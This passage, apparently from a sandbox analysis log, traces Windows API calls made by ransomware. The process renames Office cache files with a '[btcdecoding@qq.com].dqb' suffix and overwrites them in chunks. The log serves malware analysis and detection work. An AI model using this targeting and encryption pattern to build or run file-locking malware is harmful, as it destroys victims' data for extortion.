lpString2=".cab") returned 1 [0041.210] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab") returned 81 [0041.210] lstrlenW (lpString=".zip") returned 4 [0041.210] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0041.210] lstrlenW (lpString=".rar") returned 4 [0041.211] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0041.211] lstrlenW (lpString=".bz2") returned 4 [0041.211] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0041.211] lstrlenW (lpString=".7z") returned 3 [0041.211] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0041.211] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab") returned 81 [0041.211] lstrlenW (lpString=".dbf") returned 4 [0041.211] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0041.211] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab") returned 81 [0041.211] lstrlenW (lpString=".1cd") returned 4 [0041.211] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0041.211] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab") returned 81 [0041.211] lstrlenW (lpString=".jpg") returned 4 [0041.211] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0041.211] lstrcmpiW (lpString1=".cab", lpString2=".dqb") returned -1 [0041.211] lstrlenW (lpString="OWOW32LR.cab") returned 12 [0041.211] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\owow32lr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0041.211] GetFileSizeEx (in: hFile=0x184, lpFileSize=0x303ff1c | out: lpFileSize=0x303ff1c*=2928955) returned 1 [0041.211] CloseHandle (hObject=0x184) returned 1 [0041.211] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\owow32lr.cab")) returned 0x2020 [0041.212] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\owow32lr.cab.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0041.212] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\owow32lr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\owow32lr.cab.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 1 [0041.212] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\owow32lr.cab.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0041.212] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fc6c | out: lpNewFilePointer=0x0) returned 1 [0041.212] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fc2c | out: lpNewFilePointer=0x0) returned 1 [0041.212] ReadFile (in: hFile=0x184, lpBuffer=0x3b90058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x303fc38, lpOverlapped=0x0 | out: lpBuffer=0x3b90058*, lpNumberOfBytesRead=0x303fc38*=0x40000, lpOverlapped=0x0) returned 1 [0041.216] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0xee5be, lpNewFilePointer=0x0, dwMoveMethod=0x303fc2c | out: lpNewFilePointer=0x0) returned 1 [0041.216] ReadFile (in: hFile=0x184, lpBuffer=0x3bd0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x303fc38, lpOverlapped=0x0 | out: lpBuffer=0x3bd0058*, lpNumberOfBytesRead=0x303fc38*=0x40000, lpOverlapped=0x0) returned 1 [0041.224] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x303fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0041.224] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x28b13b, lpNewFilePointer=0x0, dwMoveMethod=0x303fc2c | out: lpNewFilePointer=0x0) returned 1 [0041.224] ReadFile (in: hFile=0x184, lpBuffer=0x3c10058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x303fc38, lpOverlapped=0x0 | out: lpBuffer=0x3c10058*, lpNumberOfBytesRead=0x303fc38*=0x40000, lpOverlapped=0x0) returned 1 [0041.238] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.238] WriteFile (in: hFile=0x184, lpBuffer=0x3b90020*, nNumberOfBytesToWrite=0xc0104, lpNumberOfBytesWritten=0x303fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesWritten=0x303fcb0*=0xc0104, lpOverlapped=0x0) returned 1 [0041.253] SetEndOfFile (hFile=0x184) returned 1 [0041.253] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x40000) returned 0x3f12078 [0041.508] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fc7c | out: lpNewFilePointer=0x0) returned 1 [0041.508] WriteFile (in: hFile=0x184, lpBuffer=0x3f12078*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x303fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f12078*, lpNumberOfBytesWritten=0x303fc88*=0x40000, lpOverlapped=0x0) returned 1 [0041.522] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0xee5be, lpNewFilePointer=0x0, dwMoveMethod=0x303fc7c | out: lpNewFilePointer=0x0) returned 1 [0041.522] WriteFile (in: hFile=0x184, lpBuffer=0x3f12078*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x303fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f12078*, lpNumberOfBytesWritten=0x303fc88*=0x40000, lpOverlapped=0x0) returned 1 [0041.527] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x28b13b, lpNewFilePointer=0x0, dwMoveMethod=0x303fc7c | out: lpNewFilePointer=0x0) returned 1 [0041.527] WriteFile (in: hFile=0x184, lpBuffer=0x3f12078*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x303fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f12078*, lpNumberOfBytesWritten=0x303fc88*=0x40000, lpOverlapped=0x0) returned 1 [0041.529] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3f12078 | out: hHeap=0x570000) returned 1 [0041.531] CloseHandle (hObject=0x184) returned 1 [0041.823] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0041.823] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab") returned 75 [0041.823] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab") returned 75 [0041.823] lstrlenW (lpString=".doc") returned 4 [0041.824] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0041.824] lstrlenW (lpString=".docx") returned 5 [0041.824] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0041.824] lstrlenW (lpString=".pdf") returned 4 [0041.824] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0041.824] lstrlenW (lpString=".xls") returned 4 [0041.824] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0041.824] lstrlenW (lpString=".xlsx") returned 5 [0041.824] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0041.824] lstrlenW (lpString=".ppt") returned 4 [0041.824] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0041.824] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab") returned 75 [0041.824] lstrlenW (lpString=".zip") returned 4 [0041.824] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0041.824] lstrlenW (lpString=".rar") returned 4 [0041.824] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0041.824] lstrlenW (lpString=".bz2") returned 4 [0041.824] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0041.824] lstrlenW (lpString=".7z") returned 3 [0041.824] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0041.824] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab") returned 75 [0041.824] lstrlenW (lpString=".dbf") returned 4 [0041.824] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0041.824] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab") returned 75 [0041.824] lstrlenW (lpString=".1cd") returned 4 [0041.824] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0041.824] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab") returned 75 [0041.824] lstrlenW (lpString=".jpg") returned 4 [0041.824] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0041.824] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab") returned 75 [0041.824] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab") returned 75 [0041.824] lstrlenW (lpString=".doc") returned 4 [0041.824] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0041.824] lstrlenW (lpString=".docx") returned 5 [0041.825] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0041.825] lstrlenW (lpString=".pdf") returned 4 [0041.825] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0041.825] lstrlenW (lpString=".xls") returned 4 [0041.825] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0041.825] lstrlenW (lpString=".xlsx") returned 5 [0041.825] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0041.825] lstrlenW (lpString=".ppt") returned 4 [0041.825] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0041.825] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab") returned 75 [0041.825] lstrlenW (lpString=".zip") returned 4 [0041.825] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0041.825] lstrlenW (lpString=".rar") returned 4 [0041.825] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0041.825] lstrlenW (lpString=".bz2") returned 4 [0041.825] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0041.825] lstrlenW (lpString=".7z") returned 3 [0041.825] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0041.825] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab") returned 75 [0041.825] lstrlenW (lpString=".dbf") returned 4 [0041.825] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0041.825] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab") returned 75 [0041.825] lstrlenW (lpString=".1cd") returned 4 [0041.825] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0041.825] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab") returned 75 [0041.825] lstrlenW (lpString=".jpg") returned 4 [0041.825] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0041.825] lstrcmpiW (lpString1=".cab", lpString2=".dqb") returned -1 [0041.825] lstrlenW (lpString="VisioLR.cab") returned 11 [0041.826] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiolr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0041.826] GetFileSizeEx (in: hFile=0x184, lpFileSize=0x303ff1c | out: lpFileSize=0x303ff1c*=50823389) returned 1 [0041.826] CloseHandle (hObject=0x184) returned 1 [0041.826] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiolr.cab")) returned 0x2020 [0041.826] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiolr.cab.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0041.826] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiolr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiolr.cab.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 1 [0041.826] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiolr.cab.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0041.827] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fc6c | out: lpNewFilePointer=0x0) returned 1 [0041.827] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fc2c | out: lpNewFilePointer=0x0) returned 1 [0041.827] ReadFile (in: hFile=0x184, lpBuffer=0x3b90058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x303fc38, lpOverlapped=0x0 | out: lpBuffer=0x3b90058*, lpNumberOfBytesRead=0x303fc38*=0x40000, lpOverlapped=0x0) returned 1 [0041.830] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x1028049, lpNewFilePointer=0x0, dwMoveMethod=0x303fc2c | out: lpNewFilePointer=0x0) returned 1 [0041.830] ReadFile (in: hFile=0x184, lpBuffer=0x3bd0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x303fc38, lpOverlapped=0x0 | out: lpBuffer=0x3bd0058*, lpNumberOfBytesRead=0x303fc38*=0x40000, lpOverlapped=0x0) returned 1 [0041.910] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x303fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0041.910] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x30380dd, lpNewFilePointer=0x0, dwMoveMethod=0x303fc2c | out: lpNewFilePointer=0x0) returned 1 [0041.910] ReadFile (in: hFile=0x184, lpBuffer=0x3c10058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x303fc38, lpOverlapped=0x0 | out: lpBuffer=0x3c10058*, lpNumberOfBytesRead=0x303fc38*=0x40000, lpOverlapped=0x0) returned 1 [0041.924] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.175] WriteFile (in: hFile=0x184, lpBuffer=0x3b90020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0x303fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesWritten=0x303fcb0*=0xc0102, lpOverlapped=0x0) returned 1 [0042.307] SetEndOfFile (hFile=0x184) returned 1 [0042.307] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x40000) returned 0x400a4f0 [0042.307] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fc7c | out: lpNewFilePointer=0x0) returned 1 [0042.307] WriteFile (in: hFile=0x184, lpBuffer=0x400a4f0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x303fc88, lpOverlapped=0x0 | out: lpBuffer=0x400a4f0*, lpNumberOfBytesWritten=0x303fc88*=0x40000, lpOverlapped=0x0) returned 1 [0042.308] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x1028049, lpNewFilePointer=0x0, dwMoveMethod=0x303fc7c | out: lpNewFilePointer=0x0) returned 1 [0042.308] WriteFile (in: hFile=0x184, lpBuffer=0x400a4f0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x303fc88, lpOverlapped=0x0 | out: lpBuffer=0x400a4f0*, lpNumberOfBytesWritten=0x303fc88*=0x40000, lpOverlapped=0x0) returned 1 [0042.309] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x30380dd, lpNewFilePointer=0x0, dwMoveMethod=0x303fc7c | out: lpNewFilePointer=0x0) returned 1 [0042.309] WriteFile (in: hFile=0x184, lpBuffer=0x400a4f0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x303fc88, lpOverlapped=0x0 | out: lpBuffer=0x400a4f0*, lpNumberOfBytesWritten=0x303fc88*=0x40000, lpOverlapped=0x0) returned 1 [0042.311] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x400a4f0 | out: hHeap=0x570000) returned 1 [0042.311] CloseHandle (hObject=0x184) returned 1 [0042.311] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0042.311] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab") returned 74 [0042.311] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab") returned 74 [0042.311] lstrlenW (lpString=".doc") returned 4 [0042.311] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0042.311] lstrlenW (lpString=".docx") returned 5 [0042.311] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0042.311] lstrlenW (lpString=".pdf") returned 4 [0042.311] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0042.311] lstrlenW (lpString=".xls") returned 4 [0042.311] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0042.311] lstrlenW (lpString=".xlsx") returned 5 [0042.312] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0042.312] lstrlenW (lpString=".ppt") returned 4 [0042.312] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0042.312] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab") returned 74 [0042.312] lstrlenW (lpString=".zip") returned 4 [0042.312] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0042.312] lstrlenW (lpString=".rar") returned 4 [0042.312] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0042.312] lstrlenW (lpString=".bz2") returned 4 [0042.312] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0042.312] lstrlenW (lpString=".7z") returned 3 [0042.312] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0042.312] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab") returned 74 [0042.312] lstrlenW (lpString=".dbf") returned 4 [0042.312] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0042.312] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab") returned 74 [0042.312] lstrlenW (lpString=".1cd") returned 4 [0042.312] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0042.312] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab") returned 74 [0042.312] lstrlenW (lpString=".jpg") returned 4 [0042.312] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0042.312] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab") returned 74 [0042.312] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab") returned 74 [0042.312] lstrlenW (lpString=".doc") returned 4 [0042.312] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0042.312] lstrlenW (lpString=".docx") returned 5 [0042.312] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0042.312] lstrlenW (lpString=".pdf") returned 4 [0042.312] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0042.312] lstrlenW (lpString=".xls") returned 4 [0042.312] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0042.312] lstrlenW (lpString=".xlsx") returned 5 [0042.312] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0042.312] lstrlenW (lpString=".ppt") returned 4 [0042.312] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0042.313] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab") returned 74 [0042.313] lstrlenW (lpString=".zip") returned 4 [0042.313] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0042.313] lstrlenW (lpString=".rar") returned 4 [0042.313] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0042.313] lstrlenW (lpString=".bz2") returned 4 [0042.313] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0042.313] lstrlenW (lpString=".7z") returned 3 [0042.313] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0042.313] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab") returned 74 [0042.313] lstrlenW (lpString=".dbf") returned 4 [0042.313] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0042.313] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab") returned 74 [0042.313] lstrlenW (lpString=".1cd") returned 4 [0042.313] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0042.313] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab") returned 74 [0042.313] lstrlenW (lpString=".jpg") returned 4 [0042.313] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0042.313] lstrcmpiW (lpString1=".msi", lpString2=".dqb") returned 1 [0042.313] lstrlenW (lpString="OneNoteMUI.msi") returned 14 [0042.313] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0042.313] GetFileSizeEx (in: hFile=0x184, lpFileSize=0x303ff1c | out: lpFileSize=0x303ff1c*=2503680) returned 1 [0042.313] CloseHandle (hObject=0x184) returned 1 [0042.314] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.msi")) returned 0x2020 [0042.314] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.msi.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0042.314] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.msi.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 1 [0042.314] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.msi.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0042.314] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fc6c | out: lpNewFilePointer=0x0) returned 1 [0042.314] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fc2c | out: lpNewFilePointer=0x0) returned 1 [0042.314] ReadFile (in: hFile=0x184, lpBuffer=0x3b90058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x303fc38, lpOverlapped=0x0 | out: lpBuffer=0x3b90058*, lpNumberOfBytesRead=0x303fc38*=0x40000, lpOverlapped=0x0) returned 1 [0042.390] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0xcbc00, lpNewFilePointer=0x0, dwMoveMethod=0x303fc2c | out: lpNewFilePointer=0x0) returned 1 [0042.390] ReadFile (in: hFile=0x184, lpBuffer=0x3bd0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x303fc38, lpOverlapped=0x0 | out: lpBuffer=0x3bd0058*, lpNumberOfBytesRead=0x303fc38*=0x40000, lpOverlapped=0x0) returned 1 [0042.405] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x303fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0042.405] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x223400, lpNewFilePointer=0x0, dwMoveMethod=0x303fc2c | out: lpNewFilePointer=0x0) returned 